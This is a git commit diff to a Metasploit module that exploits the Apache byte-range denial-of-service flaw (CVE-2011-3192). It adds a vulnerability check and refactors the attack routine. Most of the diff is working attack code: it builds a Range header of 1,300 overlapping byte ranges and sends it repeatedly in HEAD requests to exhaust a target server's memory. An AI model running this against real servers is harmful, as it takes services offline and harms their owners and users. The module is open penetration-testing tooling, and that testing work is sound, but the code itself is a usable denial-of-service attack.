Lands rapid7#1169 - Adds a check

wchen-r7 · wchen-r7 · commit a09b3b802397 · 2013-04-22T15:50:15.000-05:00
[Closes rapid7#1169] Conflicts: modules/auxiliary/dos/http/apache_range_dos.rb
diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb
@@ -9,7 +9,10 @@
 
 class Metasploit3 < Msf::Auxiliary
 
-	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::WmapScanFile
+	include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::Report
 	include Msf::Auxiliary::Dos
 
 	def initialize(info = {})
@@ -24,45 +27,95 @@ def initialize(info = {})
 			'Author'         =>
 				[
 					'Kingcope', #original discoverer
-					'Masashi Fujiwara' #metasploit module
+					'Masashi Fujiwara', #metasploit module
+					'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
 				],
 			'License'        => MSF_LICENSE,
+			'Actions'        =>
+				[
+					['DOS'],
+					['CHECK']
+				],
+			'DefaultAction'  => 'DOS',
 			'References'     =>
 				[
 					[ 'BID', '49303'],
 					[ 'CVE', '2011-3192'],
 					[ 'EDB', '17696'],
 					[ 'OSVDB', '74721' ],
 				],
-			'DisclosureDate' => 'Aug 19 2011'))
+			'DisclosureDate' => 'Aug 19 2011'
+		))
 
 		register_options(
 			[
 				Opt::RPORT(80),
 				OptString.new('URI', [ true,  "The request URI", '/']),
-				OptInt.new('RLIMIT', [ true,  "Number of requests to send", 50])
+				OptInt.new('RLIMIT', [ true,  "Number of requests to send",50])
 			], self.class)
 	end
 
-	def run
+	def run_host(ip)
+
+		case action.name
+		when 'DOS'
+			conduct_dos()
+
+		when 'CHECK'
+			check_for_dos()
+		end
+
+	end
+
+	def check_for_dos()
+		path = datastore['URI']
+		begin
+			res = send_request_cgi({
+				'uri'     =>  path,
+				'method'  => 'HEAD',
+				'headers' => {
+					"HOST"          => "Localhost",
+					"Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
+				}
+			})
+
+			if (res and res.code == 206)
+				print_status("Response was #{res.code}")
+				print_status("Found Byte-Range Header DOS at #{path}")
+
+				report_note(
+					:host   => rhost,
+					:port   => rport,
+					:data   => "Apache Byte-Range DOS at #{path}"
+				)
+
+			else
+				print_status("#{rhost} doesn't seem to be vulnerable at #{path}")
+			end
+
+			rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			rescue ::Timeout::Error, ::Errno::EPIPE
+		end
+	end
+
+
+	def conduct_dos()
 		uri = datastore['URI']
+		rhost = datastore['RHOST']
 		ranges = ''
 		for i in (0..1299) do
 			ranges += ",5-" + i.to_s
 		end
 		for x in 1..datastore['RLIMIT']
 			begin
-				connect
 				print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
+				res = send_request_cgi({
+					'uri'     =>  uri,
+					'method'  => 'HEAD',
+					'headers' => {
+						"HOST" => rhost,
+						"Range" => "bytes=0-#{ranges}"}},1)
 
-				sploit = "HEAD " + uri + " HTTP/1.1\r\n"
-				sploit << "Host: " + rhost + "\r\n"
-				sploit << "Range: bytes=0-" + ranges + "\r\n"
-				sploit << "Accept-Encoding: gzip\r\n"
-				sploit << "Connection: close\r\n\r\n"
-
-				sock.put(sploit)
-				disconnect
 			rescue ::Rex::ConnectionRefused
 				print_status("Unable to connect to #{rhost}:#{rport}.")
 			rescue ::Errno::ECONNRESET
